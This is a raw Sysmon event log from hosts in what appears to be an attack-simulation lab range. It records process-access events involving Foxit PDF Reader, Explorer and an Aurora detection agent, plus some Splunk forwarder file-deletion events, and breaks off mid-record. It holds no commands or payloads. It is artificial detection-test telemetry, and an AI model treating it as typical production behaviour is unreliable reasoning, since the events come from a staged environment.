10341000x800000000000000040417Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:20.209{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEFEAE5)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+11214|C:\Windows\System32\wow64win.dll+31ed0|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+363dd|C:\Windows\SYSTEM32\ntdll.dll+a9834|C:\Windows\System32\wow64win.dll+f534|C:\Windows\System32\wow64win.dll+4e07 10341000x800000000000000040416Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:20.193{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1fc75f(wow64)|C:\Windows\System32\windows.storage.dll+1fc626(wow64)|C:\Windows\System32\windows.storage.dll+1fc4a8(wow64)|C:\Windows\System32\windows.storage.dll+1fc37b(wow64)|C:\Windows\System32\windows.storage.dll+1fc115(wow64)|C:\Windows\System32\windows.storage.dll+19781e(wow64)|C:\Windows\System32\windows.storage.dll+198b76(wow64)|C:\Windows\System32\windows.storage.dll+19927d(wow64)|C:\Windows\system32\explorerframe.dll+65aad(wow64)|C:\Windows\system32\explorerframe.dll+65dfa(wow64)|C:\Windows\system32\explorerframe.dll+96782(wow64) 10341000x800000000000000040415Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:20.193{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1fc6ae(wow64)|C:\Windows\System32\windows.storage.dll+1fc626(wow64)|C:\Windows\System32\windows.storage.dll+1fc4a8(wow64)|C:\Windows\System32\windows.storage.dll+1fc37b(wow64)|C:\Windows\System32\windows.storage.dll+1fc115(wow64)|C:\Windows\System32\windows.storage.dll+19781e(wow64)|C:\Windows\System32\windows.storage.dll+198b76(wow64)|C:\Windows\System32\windows.storage.dll+19927d(wow64)|C:\Windows\system32\explorerframe.dll+65aad(wow64)|C:\Windows\system32\explorerframe.dll+65dfa(wow64)|C:\Windows\system32\explorerframe.dll+96782(wow64) 10341000x800000000000000040414Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:20.193{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1fc697(wow64)|C:\Windows\System32\windows.storage.dll+1fc626(wow64)|C:\Windows\System32\windows.storage.dll+1fc4a8(wow64)|C:\Windows\System32\windows.storage.dll+1fc37b(wow64)|C:\Windows\System32\windows.storage.dll+1fc115(wow64)|C:\Windows\System32\windows.storage.dll+19781e(wow64)|C:\Windows\System32\windows.storage.dll+198b76(wow64) 10341000x800000000000000040413Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:20.193{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1fc697(wow64)|C:\Windows\System32\windows.storage.dll+1fc626(wow64)|C:\Windows\System32\windows.storage.dll+1fc4a8(wow64)|C:\Windows\System32\windows.storage.dll+1fc37b(wow64)|C:\Windows\System32\windows.storage.dll+1fc115(wow64)|C:\Windows\System32\windows.storage.dll+19781e(wow64)|C:\Windows\System32\windows.storage.dll+198b76(wow64)|C:\Windows\System32\windows.storage.dll+19927d(wow64) 23542300x800000000000000040412Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:20.193{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F360B4F86EF4C88AD1769BB14434741E,SHA256=F60B0D9FB3AC5224272EA2142D9FF0E9B60A33E56941D45C9665A4E777C6F544,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000040411Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:20.177{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEFEAE5)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+11214|C:\Windows\System32\wow64win.dll+31ed0|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+363dd|C:\Windows\SYSTEM32\ntdll.dll+a9834|C:\Windows\System32\wow64win.dll+f534|C:\Windows\System32\wow64win.dll+4e07 10341000x800000000000000040410Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:20.162{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1301b1(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\System32\SHELL32.dll+2d563e(wow64)|C:\Windows\System32\SHELL32.dll+1d8d20(wow64)|C:\Windows\System32\SHELL32.dll+2d2f48(wow64)|C:\Windows\System32\SHELL32.dll+419591(wow64)|C:\Windows\System32\SHELL32.dll+418519(wow64)|C:\Windows\system32\explorerframe.dll+119b4f(wow64) 10341000x800000000000000040409Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:20.162{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+13012a(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\System32\SHELL32.dll+2d563e(wow64)|C:\Windows\System32\SHELL32.dll+1d8d20(wow64)|C:\Windows\System32\SHELL32.dll+2d2f48(wow64)|C:\Windows\System32\SHELL32.dll+419591(wow64)|C:\Windows\System32\SHELL32.dll+418519(wow64)|C:\Windows\system32\explorerframe.dll+119b4f(wow64) 10341000x800000000000000040408Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:20.162{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+130113(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\System32\SHELL32.dll+2d563e(wow64)|C:\Windows\System32\SHELL32.dll+1d8d20(wow64) 10341000x800000000000000040407Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:20.162{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+130113(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\System32\SHELL32.dll+2d563e(wow64)|C:\Windows\System32\SHELL32.dll+1d8d20(wow64)|C:\Windows\System32\SHELL32.dll+2d2f48(wow64) 23542300x800000000000000015433Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:21.478{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8EFA1BC72A55C1F8D03D16E44A67C5C2,SHA256=A2A1106EF71D6F8424122A6041A2F6AFA106C67AB2FB97F1D28D61510C149C88,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000040449Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:21.291{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E38C-63C7-0906-00000000AF02}2520C:\Windows\SysWOW64\DllHost.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000040448Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:21.291{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E38C-63C7-0906-00000000AF02}2520C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000040447Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:21.291{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E38C-63C7-0906-00000000AF02}2520C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000040446Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:21.290{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E38C-63C7-0906-00000000AF02}2520C:\Windows\SysWOW64\DllHost.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000040445Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:21.290{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E38C-63C7-0906-00000000AF02}2520C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000040444Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:21.290{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E38C-63C7-0906-00000000AF02}2520C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 23542300x800000000000000040443Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:21.210{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F503E69513339D5370F9F6C5927E5CED,SHA256=AD39742737DF834E7E65E81D52C2E3DF5533ED83FEE695C19BAAF19F8BDB30B8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000015465Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:22.732{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCCE-63C7-EB00-00000000B002}3756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000015464Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:22.729{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000015463Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:22.728{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-A300-00000000B002}968C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000015462Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:22.724{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000015461Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:22.721{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCBE-63C7-9400-00000000B002}4004C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000015460Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:22.720{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5300-00000000B002}3348C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000015459Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:22.719{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program 